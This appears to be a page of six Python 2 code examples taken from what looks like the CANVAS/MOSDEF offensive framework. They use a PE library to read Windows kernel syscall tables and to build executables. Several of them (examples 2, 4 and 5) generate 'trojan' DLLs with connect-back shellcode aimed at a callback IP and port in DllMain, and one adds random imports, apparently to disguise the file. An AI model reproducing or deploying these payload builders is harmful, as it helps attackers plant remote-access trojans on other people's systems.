Пример #1
0
def getWin32pFromFile(filename, syscallnum):
    p = PElib()
    p.openfile(filename)
    #look in imports for keAddSystemServiceTable
    dwIAT = p.PE.getIAT("ntoskrnl.exe", "KeAddSystemServiceTable")
    if not dwIAT:
        #could not find the IAT in the file we've loaded
        return 0
    #print "dwIAT: %x"%dwIAT
    #In the INIT section there is a call to our function
    #print "p.PE.Sections: %s"%p.PE.Sections
    init = p.PE.Sections["INIT\x00\x00\x00\x00"]
    #print "init: %x"%init.VirtualAddress
    data = p.PE.getSectionData("INIT\x00\x00\x00\x00")
    offset = data.find("\xff\x15" + intel_order(dwIAT))
    if offset == -1:
        #did not find the call to our IAT address
        return 0
    #print "offset: %x"%offset
    #now find the push for W32pServiceTable
    #thereotically the push could be several instructions back!
    offset -= 5
    if data[offset] != "\x68":
        print "No push where one is expected"
    offset += 1
    addy = str2int32_swapped(data[offset:offset + 4])
    #if addy not in .data section, bail
    #print "addy: %x"%addy
    syscalltable = []
    data = p.PE.data
    start = addy - p.PE.IMGOPThdr.ImageBase
    for i in xrange(0, syscallnum - 0x1000 + 2):
        syscalltable += [str2int32_swapped(data[start:start + 4])]
        start += 4
    return addy, syscalltable
Пример #2
0
    def make_dll(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node()
                              or self.has_wow64()) else "x86"

        if t_os.arch == "x64":
            plds = payloads64(dll=True)

            inner_pld = payloads64(module=self, dll=False)
            assembly_inner = inner_pld.callback(self.callback.ip,
                                                self.callback.port,
                                                universal=True)
            code_inner = inner_pld.assemble(assembly_inner)

            assembly_outer = plds.wrap_payload(code_inner)
            shellcode = plds.assemble(assembly_outer)

            myPElib = PElib(win64=1)
            trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
                                                 gui=False)
        else:
            trojan_dll = self.buildmosdeftrojan(self.callback.ip,
                                                self.callback.port,
                                                target_os=t_os,
                                                universal=True,
                                                encrypted=False,
                                                dll=True,
                                                win8_compatible=True)

            trojan_dll = self.mosdeftrojan

        return trojan_dll
Пример #3
0
    def create_dll_file(self, dll_name, win64=0):
        pelib = PElib(win64)

        # Create the dll in memory
        shellcode = self.createShellcode()
        buffer = pelib.createPEFileBuf({"DllMain": shellcode}, gui=False)

        return buffer
Пример #4
0
    def make_dll(self):
        t_os = canvasos('WINDOWS')
        t_os.arch = "x64" if (self.is_64bit_node()
                              or self.has_wow64()) else "x86"

        if t_os.arch == "x64":
            plds = payloads64(dll=True)

            inner_pld = payloads64(module=self, dll=False)
            assembly_inner = inner_pld.callback(self.callback.ip,
                                                self.callback.port,
                                                universal=True)
            code_inner = inner_pld.assemble(assembly_inner)

            assembly_outer = plds.wrap_payload(code_inner)
            shellcode = plds.assemble(assembly_outer)

            myPElib = PElib(win64=1)
            trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
                                                 gui=False)
        else:
            plds = payloads(module=self, dll=True)
            assembly_inner = plds.callback(self.callback.ip,
                                           self.callback.port,
                                           universal=True)
            shellcode = plds.assemble(assembly_inner)

            myPElib = PElib()
            importante = myPElib.get_random_imports()
            trojan_dll = myPElib.createPEFileBuf({'DllMain': shellcode},
                                                 gui=False,
                                                 importante=importante)

        return trojan_dll
Пример #5
0
    def create_dll_file(self, win64=0):
        pelib = PElib(win64=win64)

        # Create the dll in memory
        shellcode = None
        buffer = None
        if not win64:
            shellcode = self.createShellcode()
            buffer = pelib.createPEFileBuf({"DllMain": shellcode}, gui=False)
            return buffer
        else:
            tos = canvasos("Windows")
            tos.arch = 'x64'
            text = self.buildmosdeftrojan(self.callback.ip,
                                          self.callback.port,
                                          target_os=tos,
                                          universal=True,
                                          encrypted=False,
                                          dll=True,
                                          win8_compatible=True)
            return self.mosdeftrojan
Пример #6
0
    def run(self):
        self.source = self.argsDict.get("source", self.source)
        self.dest = self.argsDict.get("destination", self.dest)
        self.args = self.argsDict.get("arguments", self.args)

        # arguments came in this way: cmd=dir /c|directory=c:\winnt\
        # the value of the argument can only be string by now :( [i need to change that]
        arguments = {}
        self.setInfo("Writting file: %s (in progress)" % self.dest, showlog=1)

        import string
        sp = self.args.split("|")
        for a in sp:
            if not a:
                continue

            var = a.split("=")
            if len(var) == 2:
                arguments[string.strip(var[0])] = var[1]

        from MOSDEF.pelib import PElib
        p = PElib()
        try:
            code = open(self.source, "rb").read()
        except:
            self.log("No file %s found to read...bailing out" % self.source)
            return 0

        if string.lower(self.dest[-4:]) != ".exe":
            self.dest += ".exe"
        print dir(p)
        size = p.createMOSDEFPE(self.dest, code, arguments)
        self.setInfo("Writting file: %s (success)" % self.dest, showlog=1)

        self.log("File %s written, size %d bytes" % (self.dest, size))

        return 1